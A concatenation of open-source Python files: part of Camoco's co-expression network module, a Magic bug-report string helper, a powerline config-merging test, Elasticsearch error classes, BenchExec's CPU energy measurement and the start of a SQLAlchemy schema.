# Fetch the Expr Matrix
dm = self.expr(
genes=genes,
accessions=accessions,
raw=raw,
gene_normalize=gene_normalize,
)
# set the outliers to the maximium value for the heatmap
dm[dm > expr_boundaries] = expr_boundaries
dm[dm < -1*expr_boundaries] = -1 * expr_boundaries
# Get the Gene clustering order
if cluster_method in hier_cluster_methods:
self.log("Ordering rows by leaf")
expr_linkage = fastcluster.linkage(dm.fillna(0), method=cluster_method)
order = leaves_list(expr_linkage)
dm = dm.iloc[order, :]
elif cluster_method == "mcl":
self.log("Ordering rows by MCL cluster")
order = (
self.clusters.loc[dm.index]
.fillna(np.inf)
.sort_values(by="cluster")
.index.values
)
dm = dm.loc[order, :]
else:
# No cluster order.
self.log("Unknown gene ordering: {}, no ordering performed", cluster_method)
# Get leaves of accessions
if cluster_accessions:
if cluster_method == "mcl":
acc_clus_method = "ward"
else:
acc_clus_method = cluster_method
accession_linkage = fastcluster.linkage(
dm.fillna(0).T, method=acc_clus_method
)
# Re-order the matrix based on tree
order = leaves_list(accession_linkage)
dm = dm.iloc[:, order]
# Save plot if provided filename
if ax is None:
fig = plt.figure(facecolor="white", figsize=figsize,constrained_layout=True)
ax = fig.add_subplot(111)
if plot_dendrogram == True:
gs = fig.add_gridspec(
2, 2, height_ratios=[3, 1], width_ratios=[3, 1], hspace=0, wspace=0
)
ax = plt.subplot(gs[0])
# make the axes for the dendrograms
gene_ax = plt.subplot(gs[1])
gene_ax.set_xticks([])
gene_ax.set_yticks([])
accession_ax = plt.subplot(gs[2])
# Plot the Expression matrix
nan_mask = np.ma.array(dm, mask=np.isnan(dm))
if cmap is None:
cmap = self._cmap
else:
cmap = plt.get_cmap(cmap)
# Set the nan color to the middle unless a color is specifid
if nan_color is None:
nan_color = cmap(0.5)
cmap.set_bad(nan_color, 1.0)
vmax = max(np.nanmin(abs(dm)), np.nanmax(abs(dm)))
vmin = vmax * -1
im = ax.matshow(nan_mask, aspect="auto", cmap=cmap, vmax=vmax, vmin=vmin)
# Intelligently add labels
ax.grid(False)
ax.tick_params(labelsize=8)
if (
(include_accession_labels is None and len(dm.columns) < 60)
or include_accession_labels == True
):
ax.set(xticklabels=dm.columns.values, yticklabels=dm.index.values)
ax.tick_params("x", labelrotation=45)
for label in ax.get_xticklabels():
label.set_horizontalalignment('left')
ax.set(xticks=np.arange(len(dm.columns)))
if (
(include_gene_labels is None and len(dm.index) < 100)
or include_gene_labels == True
):
ax.set(yticks=np.arange(len(dm.index)))
fig.align_labels()
# ax.figure.colorbar(im)
if plot_dendrogram == True:
with plt.rc_context({"lines.linewidth": 1.0}):
from scipy.cluster import hierarchy
hierarchy.set_link_color_palette(["k"])
# Plot the accession dendrogram
import sys
if cluster_accessions == True:
sys.setrecursionlimit(10000)
dendrogram(
accession_linkage,
ax=accession_ax,
color_threshold=np.inf,
orientation="bottom",
)
accession_ax.set_facecolor("w")
accession_ax.set_xticks([])
accession_ax.set_yticks([])
# Plot the gene dendrogram
if cluster_method in hier_cluster_methods:
dendrogram(
expr_linkage,
ax=gene_ax,
orientation="right",
color_threshold=np.inf,
)
gene_ax.set_xticks([])
gene_ax.set_yticks([])
gene_ax.set_facecolor("w")
# Save if you wish
if filename is not None:
plt.savefig(filename, dpi=300, figsize=figsize)
plt.close()
return ax.figure
def plot_scores(self, filename=None, pcc=True, bins=50):
"""
Plot the histogram of PCCs.
Parameters
----------
filename : str (default: None)
The output filename, if none will return the matplotlib object
pcc : bool (default:True)
flag to convert scores to pccs
bins : int (default: 50)
the number of bins in the histogram
"""
fig = plt.figure(figsize=(8, 6))
# grab the scores only and put in a
# np array to save space (pandas DF was HUGE)
scores = odo(self.coex.score, np.ndarray)[~np.isnan(self.coex.score)]
if pcc:
self.log("Transforming scores")
scores = (scores * float(self._global("pcc_std"))) + float(
self._global("pcc_mean")
)
# Transform Z-scores to pcc scores (inverse fisher transform)
scores = np.tanh(scores)
plt.hist(scores, bins=bins)
plt.xlabel("PCC") if pcc else plt.xlabel("Z-Score")
plt.ylabel("Freq")
if filename is not None:
plt.savefig(filename)
plt.close()
else:
return fig
def compare_degree(self, obj, diff_genes=10, score_cutoff=3):
"""
Compares the degree of one COB to another.
Parameters
----------
obj : COB instance
The object you are comparing the degree to.
diff_genes : int (default: 10)
The number of highest and lowest different
genes to report
score_cutoff : int (default: 3)
The edge score cutoff used to called
significant.
"""
self.log("Comparing degrees of {} and {}", self.name, obj.name)
# Put the two degree tables in the same table
lis = pd.concat(
[self.degree.copy(), obj.degree.copy()], axis=1, ignore_index=True
)
# Filter the table of entries to ones where both entries exist
lis = lis[(lis[0] > 0) & (lis[1] > 0)]
delta = lis[0] - lis[1]
# Find the stats beteween the two sets,
# and the genes with the biggest differences
delta.sort_values(ascending=False, inplace=True)
highest = sorted(
list(dict(delta[:diff_genes]).items()), key=lambda x: x[1], reverse=True
)
lowest = sorted(
list(dict(delta[-diff_genes:]).items()), key=lambda x: x[1], reverse=False
)
ans = {
"correlation_between_cobs": lis[0].corr(lis[1]),
"mean_of_difference": delta.mean(),
"std_of_difference": delta.std(),
("bigger_in_" + self.name): highest,
("bigger_in_" + obj.name): lowest,
}
return ans
""" ----------------------------------------------------------------------
Internal Methods
"""
def _calculate_coexpression(self, significance_thresh=3):
"""
Generates pairwise PCCs for gene expression profiles in self._expr.
Also calculates pairwise gene distance.
"""
# 1. Calculate the PCCs
self.log("Calculating Coexpression")
num_bytes_needed = comb(self.shape()[0], 2) * 8
if num_bytes_needed > psutil.virtual_memory().available:
raise MemoryError("Not enough RAM to calculate co-expression network")
# pass in a contigious array to the cython function to calculate PCCs
pccs = PCCUP.pair_correlation(
np.ascontiguousarray(
# PCCUP expects floats
self._expr.as_matrix().astype("float")
)
)
self.log("Applying Fisher Transform")
pccs[pccs >= 1.0] = 0.9999999
pccs[pccs <= -1.0] = -0.9999999
pccs = np.arctanh(pccs)
gc.collect()
# Do a PCC check to make sure they are not all NaNs
if not any(np.logical_not(np.isnan(pccs))):
raise ValueError(
"Not enough data is available to reliably calculate co-expression, "
"please ensure you have more than 10 accessions to calculate correlation coefficient"
)
self.log("Calculating Mean and STD")
# Sometimes, with certain datasets, the NaN mask overlap
# completely for the two genes expression data making its PCC a nan.
# This affects the mean and std fro the gene.
pcc_mean = np.ma.masked_array(pccs, np.isnan(pccs)).mean()
self._global("pcc_mean", pcc_mean)
gc.collect()
pcc_std = np.ma.masked_array(pccs, np.isnan(pccs)).std()
self._global("pcc_std", pcc_std)
gc.collect()
# 2. Calculate Z Scores
self.log("Finding adjusted scores")
pccs = (pccs - pcc_mean) / pcc_std
gc.collect()
# 3. Build the dataframe
self.log("Build the dataframe and set the significance threshold")
self._global("significance_threshold", significance_thresh)
raw_coex = self._raw_coex(pccs, significance_thresh)
del pccs
gc.collect()
# 4. Calculate Gene Distance
self.log("Calculating Gene Distance")
raw_coex.addcol(
self.refgen.pairwise_distance(
gene_list=self.refgen.from_ids(self._expr.index)
),
pos=1,
name="distance",
)
gc.collect()
# 5. Cleanup
raw_coex.flush()
del raw_coex
gc.collect()
# 6. Load the new table into the object
self.coex = self._bcolz("coex", blaze=True)
self.set_sig_edge_zscore(float(self._global("significance_threshold")))
self.log("Done")
return self
def _calculate_degree(self, update_db=True):
"""
Calculates degrees of genes within network.
"""
self.log("Building Degree")
# Get significant expressions and dump coex from memory for time being
# Generate a df that starts all genes at 0
names = self._expr.index.values
self.degree = pd.DataFrame(0, index=names, columns=["Degree"])
# Get the index and find the counts
self.log("Calculating Gene degree")
sigs = np.arange(len(self.coex))[odo(self.coex.significant, np.ndarray)]
sigs = PCCUP.coex_expr_index(sigs, len(self._expr.index.values))
sigs = list(Counter(chain(*sigs)).items())
if len(sigs) > 0:
# Translate the expr indexes to the gene names
for i, degree in sigs:
self.degree.ix[names[i]] = degree
# Update the database
if update_db:
self._bcolz("degree", df=self.degree)
# Cleanup
del sigs
del names
gc.collect()
return self
def _calculate_gene_hierarchy(self, method="single"):
"""
Calculate the hierarchical gene distance for the Expr matrix
using the coex data.
Notes
-----
This is kind of expenive.
"""
import fastcluster
# We need to recreate the original PCCs
self.log("Calculating hierarchical clustering using {}".format(method))
if len(self.coex) == 0:
raise ValueError("Cannot calculate leaves without coex")
pcc_mean = float(self._global("pcc_mean"))
pcc_std = float(self._global("pcc_std"))
# Get score column and dump coex from memory for time being
dists = odo(self.coex.score, np.ndarray)
# Subtract pccs from 1 so we do not get negative distances
dists = (dists * pcc_std) + pcc_mean
dists = np.tanh(dists)
dists = 1 - dists
# convert nan to 0's, linkage can only use finite values
dists[np.isnan(dists)] = 0
gc.collect()
# Find the leaves from hierarchical clustering
gene_link = fastcluster.linkage(dists, method=method)
return gene_link
def _calculate_leaves(self, method="single"):
"""
This calculates the leaves of the dendrogram from the coex
"""
gene_link = self._calculate_gene_hierarchy(method=method)
self.log("Finding the leaves")
leaves = leaves_list(gene_link)
gc.collect()
# Put them in a dataframe and stow them
self.leaves = pd.DataFrame(leaves, index=self._expr.index, columns=["index"])
self._gene_link = gene_link
self._bcolz("leaves", df=self.leaves)
# Cleanup and reinstate the coex table
gc.collect()
return self
def _calculate_clusters(self):
"""
Calculates global clusters
"""
clusters = self.mcl()
self.log("Building cluster dataframe")
names = self._expr.index.values
self.clusters = pd.DataFrame(np.nan, index=names, columns=["cluster"])
if len(clusters) > 0:
self.clusters = pd.DataFrame(
data=[
(gene.id, i)
for i, cluster in enumerate(clusters)
for gene in cluster
],
columns=["Gene", "cluster"],
).set_index("Gene")
self._bcolz("clusters", df=self.clusters)
self.log("Creating Cluster Ontology")
terms = []
for i, x in enumerate(self.clusters.groupby("cluster")):
genes = self.refgen[x[1].index.values]
terms.append(
Term(
"MCL{}".format(i),
desc="{} MCL Cluster {}".format(self.name, i),
loci=genes,
)
)
self.MCL = Ontology.from_terms(
terms,
"{}MCL".format(self.name),
"{} MCL Clusters".format(self.name),
self.refgen,
)
self.log("Finished finding clusters")
return self
def _coex_concordance(self, gene_a, gene_b, maxnan=10, return_dict=False):
"""
This is a sanity method to ensure that the pcc calculated
directly from the expr profiles matches the one stored in
the database
"""
expr_a = self.expr_profile(gene_a).values
expr_b = self.expr_profile(gene_b).values
mask = np.logical_and(np.isfinite(expr_a), np.isfinite(expr_b))
if sum(mask) < maxnan:
# too many nans to reliably calculate pcc
return np.nan
r = pearsonr(expr_a[mask], expr_b[mask])[0]
# fisher transform it
z = np.arctanh(r - 0.0000001)
# standard normalize it
z = (z - float(self._global("pcc_mean"))) / float(self._global("pcc_std"))
if return_dict:
return {'pearsonr': r, 'zscore': z}
else:
return z
def _sparse_fruchterman_reingold(
self,
A,
k=None,
pos=None,
fixed=None,
iterations=50,
threshold=1e-4,
seed=42
):
'''
This code was modified from the NetworkX algorithm for
sparse_fruchterman_reingold spring embedded algorithm.
See the following page for details on the source:
https://github.com/networkx/networkx/blob/15e17c0a2072ea56df3d9cd9152ee682203e8cd9/networkx/drawing/layout.py#L502
=======
NetworkX is distributed with the 3-clause BSD license.
::
Copyright (C) 2004-2020, NetworkX Developers
Aric Hagberg <hagberg@lanl.gov>
Dan Schult <dschult@colgate.edu>
Pieter Swart <swart@lanl.gov>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
* Neither the name of the NetworkX Developers nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
try:
nnodes, _ = A.shape
except AttributeError:
msg = "fruchterman_reingold() takes an adjacency matrix as input"
raise ValueError(msg)
# Create random positions based on the seed
if pos is None:
# random initial positions
pos = np.asarray(
np.random.RandomState().rand(nnodes,2),
dtype=A.dtype
)
else:
# make sure positions are of same type as matrix
pos = pos.astype(A.dtype)
# optimal distance between nodes
if k is None:
k = np.sqrt(1.0 / nnodes)
# the initial "temperature" is about .1 of domain area (=1x1)
# this is the largest step allowed in the dynamics.
# We need to calculate this in case our fixed positions force our domain
# to be much bigger than 1x1
t = max(max(pos.T[0]) - min(pos.T[0]), max(pos.T[1]) - min(pos.T[1])) * 0.1
# simple cooling scheme.
# linearly step down by dt on each iteration so last iteration is size dt.
dt = t / float(iterations + 1)
delta = np.zeros((pos.shape[0], pos.shape[0], pos.shape[1]), dtype=A.dtype)
# the inscrutable (but fast) version
# this is still O(V^2)
# could use multilevel methods to speed this up significantly
for iteration in range(iterations):
self.log(f"On iteration {iteration}")
# matrix of difference between points
delta = pos[:, np.newaxis, :] - pos[np.newaxis, :, :]
# distance between points
distance = np.linalg.norm(delta, axis=-1)
# enforce minimum distance of 0.01
np.clip(distance, 0.01, None, out=distance)
# displacement "force"
displacement = np.einsum('ijk,ij->ik',
delta,
(k * k / distance**2 - A * distance / k))
# update positions
length = np.linalg.norm(displacement, axis=-1)
length = np.where(length < 0.01, 0.1, length)
delta_pos = np.einsum('ij,i->ij', displacement, t / length)
if fixed is not None:
# don't change positions of fixed nodes
delta_pos[fixed] = 0.0
pos += delta_pos
# cool temperature
t -= dt
err = np.linalg.norm(delta_pos) / nnodes
if err < threshold:
break
return pos
""" -----------------------------------------------------------------------
Class Methods -- Factory Methods
"""
@classmethod
def create(cls, name, description, refgen):
"""
"""
self = super().create(name, description, refgen)
self._bcolz("gene_qc_status", df=pd.DataFrame())
self._bcolz("accession_qc_status", df=pd.DataFrame())
self._bcolz("coex", df=pd.DataFrame())
self._bcolz("degree", df=pd.DataFrame())
self._bcolz("mcl_cluster", df=pd.DataFrame())
self._bcolz("leaves", df=pd.DataFrame())
self._expr_index = defaultdict(
lambda: None, {gene: index for index, gene in enumerate(self._expr.index)}
)
return self
@classmethod
def from_Expr(cls, expr, zscore_cutoff=3, **kwargs):
"""
Create a COB instance from an camoco.Expr (Expression) instance.
A COB inherits all the methods of a Expr instance and implements
additional coexpression specific methods. This method accepts an
already build Expr instance and then performs the additional
computations needed to build a full fledged COB instance.
Parameters
----------
expr : camoco.Expr
The camoco expression object used to build the
co-expression network.
zscore_cutoff : int (defualt: 3)
The zscore cutoff for the network.
Returns
-------
camoco.COB instance
"""
# The Expr object already exists, just get a handle on it
self = expr
self._calculate_coexpression()
self._calculate_degree()
self._calculate_leaves()
self._calculate_clusters()
return self
@classmethod
def from_DataFrame(
cls, df, name, description, refgen, rawtype=None, zscore_cutoff=3, **kwargs
):
"""
The method will read the table in (as a pandas dataframe),
build the Expr object passing all keyword arguments in ``**``kwargs
to the classmethod Expr.from_DataFrame(...). See additional
``**``kwargs in COB.from_Expr(...)
Parameters
----------
df : pandas.DataFrame
A Pandas dataframe containing the expression information.
Assumes gene names are in the index while accessions
(experiments) are stored in the columns.
name : str
Name of the dataset stored in camoco database
description : str
Short string describing the dataset
refgen : camoco.RefGen
A Camoco refgen object which describes the reference
genome referred to by the genes in the dataset. This
is cross references during import so we can pull information
about genes we are interested in during analysis.
rawtype : str (default: None)
This is noted here to reinforce the impotance of the rawtype
passed to camoco.Expr.from_DataFrame. See docs there
for more information.
zscore_cutoff : int (defualt: 3)
The zscore cutoff for the network.
\*\*kwargs : key,value pairs
additional parameters passed to subsequent methods.
(see Expr.from_DataFrame)
"""
# Create a new Expr object from a data frame
expr = super().from_DataFrame(
df,
name,
description,
refgen,
rawtype,
zscore_cutoff=zscore_cutoff,
**kwargs,
)
return cls.from_Expr(expr)
@classmethod
def from_table(
cls,
filename,
name,
description,
refgen,
rawtype=None,
sep="\t",
index_col=None,
zscore_cutoff=3,
**kwargs,
):
"""
Build a COB Object from an FPKM or Micrarray CSV. This is a
convenience method which handles reading in of tables.
Files need to have gene names as the first column and
accession (i.e. experiment) names as the first row. All
kwargs will be passed to COB.from_DataFrame(...). See
docstring there for option descriptions.
Parameters
----------
filename : str (path)
the path to the FPKM table in csv or tsv
name : str
Name of the dataset stored in camoco database
description : str
Short string describing the dataset
refgen : camoco.RefGen
A Camoco refgen object which describes the reference
genome referred to by the genes in the dataset. This
is cross references during import so we can pull information
about genes we are interested in during analysis.
rawtype : str (default: None)
This is noted here to reinforce the importance of the rawtype
passed to camoco.Expr.from_DataFrame. See docs there for
more information.
sep : str (default: \\t)
Specifies the delimiter of the file referenced by the
filename parameter.
index_col : str (default: None)
If not None, this column will be set as the gene index
column. Useful if there is a column name in the text file
for gene names.
zscore_cutoff : int (defualt: 3)
The zscore cutoff for the network.
**kwargs : key value pairs
additional parameters passed to subsequent methods.
Returns
-------
a COB object
"""
df = pd.read_table(filename, sep=sep, compression="infer", index_col=index_col)
return cls.from_DataFrame(
df,
name,
description,
refgen,
rawtype=rawtype,
zscore_cutoff=zscore_cutoff,
**kwargs,
)
def fix_val(val):
if isinf(val):
return -1
if np.isnan(val):
# because Fuck JSON
return "null"
else:
return val
|
schae234/Camoco
|
camoco/COB.py
|
Python
|
mit
| 95,136
|
import itertools
import re
from typing import Any, Iterable, List, Match, Optional
METACATS = ['Cardset', 'Collection', 'Deck Building', 'Duel Scene', 'Leagues', 'Play Lobby', 'Trade']
CATEGORIES = ['Advantageous', 'Disadvantageous', 'Game Breaking', 'Avoidable Game Breaking', 'Graphical', 'Non-Functional ability']
BADCATS = ['Game Breaking']
CODE_REGEX = r'^Code: (.*)$'
BBT_REGEX = r'^Bug Blog Text: (.*)$'
DISCORD_REGEX = r'^Reported on Discord by (\w+#[0-9]+)$'
IMAGES_REGEX = r'^<!-- Images --> (.*)$'
REGEX_CARDREF = r'\[?\[([^\]]*)\]\]?'
REGEX_SEARCHREF = r'\{\{\{([\w:/^$" ]+)\}\}\}'
REGEX_BBCAT = r'^([\w ]+) ?(\([\w, ]+\))?'
BAD_AFFECTS_REGEX = r'Affects: (\[Card Name\]\(, \[Second Card name\], etc\)\r?\n)\['
FEEDBACK_LINK_REGEX = r'((http|https)\:\/\/)?feedback.wizards.com/forums/([a-zA-Z0-9\.\&\/\?\:@\-_=#])*'
def remove_smartquotes(text: str) -> str:
return text.replace('’', "'").replace('“', '"').replace('”', '"')
def strip_squarebrackets(title: str) -> str:
def get_name(match: Match[str]) -> str:
return match.group(1).strip()
title = re.sub(REGEX_CARDREF, get_name, title)
return title
def grouper(n: int, iterable: Iterable, fillvalue: Any = None) -> Iterable:
"""grouper(3, 'ABCDEFG', 'x') --> ABC DEF Gxx"""
args = [iter(iterable)] * n
return itertools.zip_longest(*args, fillvalue=fillvalue)
def get_cards_from_string(item: str) -> List[str]:
cards = re.findall(REGEX_CARDREF, item)
return cards
def set_body_field(body: str, field: str, value: str) -> str:
regex = r'^' + field + r': (.*)$'
line = f'{field}: {value}'
m = re.search(regex, body, re.MULTILINE)
if m:
return re.sub(regex, line, body, flags=re.MULTILINE)
return f'{body}\n{line}'
def get_body_field(body: str, field: str) -> Optional[str]:
regex = r'^' + field + r': (.*)$'
m = re.search(regex, body, re.MULTILINE)
if m:
return m.group(1)
return None
|
PennyDreadfulMTG/Penny-Dreadful-Tools
|
modo_bugs/strings.py
|
Python
|
gpl-3.0
| 1,958
|
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import os
import json
from subprocess import check_call
from operator import add
from shutil import rmtree
from powerline.lib.dict import mergedicts_copy as mdc
from powerline import Powerline
from tests import TestCase
from tests.lib.config_mock import select_renderer, UT
CONFIG_DIR = 'tests/config'
root_config = lambda: {
'common': {
'interval': None,
'watcher': 'auto',
},
'ext': {
'test': {
'theme': 'default',
'colorscheme': 'default',
},
},
}
colors_config = lambda: {
'colors': {
'c1': 1,
'c2': 2,
},
'gradients': {
},
}
colorscheme_config = lambda: {
'groups': {
'g': {'fg': 'c1', 'bg': 'c2', 'attrs': []},
}
}
theme_config = lambda: {
'segment_data': {
's': {
'before': 'b',
},
},
'segments': {
'left': [
{
'type': 'string',
'name': 's',
'contents': 't',
'highlight_groups': ['g'],
},
],
'right': [],
}
}
top_theme_config = lambda: {
'dividers': {
'left': {
'hard': '#>',
'soft': '|>',
},
'right': {
'hard': '<#',
'soft': '<|',
},
},
'spaces': 0,
}
main_tree = lambda: {
'1/config': root_config(),
'1/colors': colors_config(),
'1/colorschemes/default': colorscheme_config(),
'1/themes/test/default': theme_config(),
'1/themes/' + UT: top_theme_config(),
'1/themes/other1': mdc(top_theme_config(), {
'dividers': {
'left': {
'hard': '!>',
}
}
}),
'1/themes/other2': mdc(top_theme_config(), {
'dividers': {
'left': {
'hard': '>>',
}
}
}),
}
def mkdir_recursive(directory):
if os.path.isdir(directory):
return
mkdir_recursive(os.path.dirname(directory))
os.mkdir(directory)
class TestPowerline(Powerline):
def get_config_paths(self):
return tuple(sorted([
os.path.join(CONFIG_DIR, d)
for d in os.listdir(CONFIG_DIR)
]))
class WithConfigTree(object):
__slots__ = ('tree', 'p', 'p_kwargs')
def __init__(self, tree, p_kwargs={'run_once': True}):
self.tree = tree
self.p = None
self.p_kwargs = p_kwargs
def __enter__(self, *args):
os.mkdir(CONFIG_DIR)
for k, v in self.tree.items():
fname = os.path.join(CONFIG_DIR, k) + '.json'
mkdir_recursive(os.path.dirname(fname))
with open(fname, 'w') as F:
json.dump(v, F)
select_renderer(simpler_renderer=True)
self.p = TestPowerline(
ext='test',
renderer_module='tests.lib.config_mock',
**self.p_kwargs
)
if os.environ.get('POWERLINE_RUN_LINT_DURING_TESTS'):
try:
check_call(['scripts/powerline-lint'] + reduce(add, (
['-p', d] for d in self.p.get_config_paths()
)))
except:
self.__exit__()
raise
return self.p.__enter__(*args)
def __exit__(self, *args):
try:
rmtree(CONFIG_DIR)
finally:
if self.p:
self.p.__exit__(*args)
class TestMerging(TestCase):
def assertRenderEqual(self, p, output, **kwargs):
self.assertEqual(p.render(**kwargs).replace(' ', ' '), output)
def test_not_merged_config(self):
with WithConfigTree(main_tree()) as p:
self.assertRenderEqual(p, '{12} bt{2-}#>{--}')
def test_root_config_merging(self):
with WithConfigTree(mdc(main_tree(), {
'2/config': {
'common': {
'default_top_theme': 'other1',
}
},
})) as p:
self.assertRenderEqual(p, '{12} bt{2-}!>{--}')
with WithConfigTree(mdc(main_tree(), {
'2/config': {
'common': {
'default_top_theme': 'other1',
}
},
'3/config': {
'common': {
'default_top_theme': 'other2',
}
},
})) as p:
self.assertRenderEqual(p, '{12} bt{2-}>>{--}')
def test_top_theme_merging(self):
with WithConfigTree(mdc(main_tree(), {
'2/themes/' + UT: {
'spaces': 1,
},
'3/themes/' + UT: {
'dividers': {
'left': {
'hard': '>>',
}
}
},
})) as p:
self.assertRenderEqual(p, '{12} bt {2-}>>{--}')
def test_colors_config_merging(self):
with WithConfigTree(mdc(main_tree(), {
'2/colors': {
'colors': {
'c1': 3,
}
},
})) as p:
self.assertRenderEqual(p, '{32} bt{2-}#>{--}')
with WithConfigTree(mdc(main_tree(), {
'2/colors': {
'colors': {
'c1': 3,
}
},
'3/colors': {
'colors': {
'c1': 4,
}
},
})) as p:
self.assertRenderEqual(p, '{42} bt{2-}#>{--}')
with WithConfigTree(mdc(main_tree(), {
'2/colors': {
'colors': {
'c1': 3,
}
},
'3/colors': {
'colors': {
'c2': 4,
}
},
})) as p:
self.assertRenderEqual(p, '{34} bt{4-}#>{--}')
def test_colorschemes_merging(self):
with WithConfigTree(mdc(main_tree(), {
'2/colorschemes/default': {
'groups': {
'g': {'fg': 'c2', 'bg': 'c1', 'attrs': []},
}
},
})) as p:
self.assertRenderEqual(p, '{21} bt{1-}#>{--}')
def test_theme_merging(self):
with WithConfigTree(mdc(main_tree(), {
'2/themes/test/default': {
'segment_data': {
's': {
'after': 'a',
}
}
},
})) as p:
self.assertRenderEqual(p, '{12} bta{2-}#>{--}')
if __name__ == '__main__':
from tests import main
main()
|
S0lll0s/powerline
|
tests/test_config_merging.py
|
Python
|
mit
| 5,077
|
# Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from typing import Any, Dict, List
class BulkIndexError(Exception):
def __init__(self, message: Any, errors: List[Dict[str, Any]]):
super().__init__(message)
self.errors: List[Dict[str, Any]] = errors
class ScanError(Exception):
scroll_id: str
def __init__(self, scroll_id: str, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
self.scroll_id = scroll_id
|
elastic/elasticsearch-py
|
elasticsearch/helpers/errors.py
|
Python
|
apache-2.0
| 1,213
|
# BenchExec is a framework for reliable benchmarking.
# This file is part of BenchExec.
#
# Copyright (C) 2007-2015 Dirk Beyer
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# prepare for Python 3
from __future__ import absolute_import, division, print_function, unicode_literals
# THIS MODULE HAS TO WORK WITH PYTHON 2.7!
import collections
import logging
import os
import subprocess
import signal
import re
from benchexec.util import find_executable
from decimal import Decimal
DOMAIN_PACKAGE = "package"
DOMAIN_CORE = "core"
DOMAIN_UNCORE = "uncore"
DOMAIN_DRAM = "dram"
class EnergyMeasurement(object):
def __init__(self, executable):
self._executable = executable
self._measurement_process = None
@classmethod
def create_if_supported(cls):
executable = find_executable('cpu-energy-meter', exitOnError=False, use_current_dir=False)
if executable is None: # not available on current system
logging.debug('Energy measurement not available because cpu-energy-meter binary could not be found.')
return None
return cls(executable)
def start(self):
"""Starts the external measurement program."""
assert not self.is_running(), 'Attempted to start an energy measurement while one was already running.'
self._measurement_process = subprocess.Popen(
[self._executable, '-r'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=10000,
preexec_fn=os.setpgrp, # Prevent delivery of Ctrl+C to subprocess
)
def stop(self):
"""Stops the external measurement program and returns the measurement result,
if the measurement was running."""
consumed_energy = collections.defaultdict(dict)
if not self.is_running():
return None
# cpu-energy-meter expects SIGINT to stop and report its result
self._measurement_process.send_signal(signal.SIGINT)
(out, err) = self._measurement_process.communicate()
assert self._measurement_process.returncode is not None
if self._measurement_process.returncode:
logging.debug(
"Energy measurement terminated with return code %s",
self._measurement_process.returncode)
self._measurement_process = None
for line in err.splitlines():
logging.debug("energy measurement stderr: %s", line)
for line in out.splitlines():
line = line.decode('ASCII')
logging.debug("energy measurement output: %s", line)
match = re.match('cpu(\d+)_([a-z]+)_joules=(\d+\.?\d*)', line)
if not match:
continue
cpu, domain, energy = match.groups()
cpu = int(cpu)
energy = Decimal(energy)
consumed_energy[cpu][domain] = energy
return consumed_energy
def is_running(self):
"""Returns True if there is currently an instance of the external measurement program running, False otherwise."""
return self._measurement_process is not None
def format_energy_results(energy):
"""Take the result of an energy measurement and return a flat dictionary that contains all values."""
if not energy:
return {}
result = {}
cpuenergy = Decimal(0)
for pkg, domains in energy.items():
for domain, value in domains.items():
if domain == DOMAIN_PACKAGE:
cpuenergy += value
result['cpuenergy-pkg{}'.format(pkg)] = value
else:
result['cpuenergy-pkg{}-{}'.format(pkg, domain)] = value
result['cpuenergy'] = cpuenergy
result = collections.OrderedDict(sorted(result.items()))
return result
|
martin-neuhaeusser/benchexec
|
benchexec/intel_cpu_energy.py
|
Python
|
apache-2.0
| 4,296
|
"""
DDL and other schema creational operations for TPOT transactional tables
holding pre-aggregated data for outcomes analysis
"""
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, ForeignKey, Integer, Float, String, Boolean, Date
from sqlalchemy.orm import relationship
Base = declarative_base()
class Participant(Base):
__tablename__ = 'participant'
participant_id = Column(Integer, primary_key=True)
wioa_participant = Column(Boolean, nullable=False, default=False)
wioa_lta_participant = Column(Boolean, nullable=False, default=False)
wages = relationship('Wage', backref='participant')
programs = relationship('Program', secondary='participant_program')
class Program(Base):
__tablename__ = 'program'
program_cip = Column(Integer, primary_key=True)
name = Column(String(140), nullable=False)
potential_outcome_id = Column(Integer, ForeignKey('outcome.potential_outcome_id'))
participants = relationship('Participant', secondary='participant_program')
providers = relationship('Provider', secondary='program_provider')
class ParticipantProgram(Base):
__tablename__ = 'participant_program'
participant_id = Column(Integer, ForeignKey('participant.participant_id'), primary_key=True)
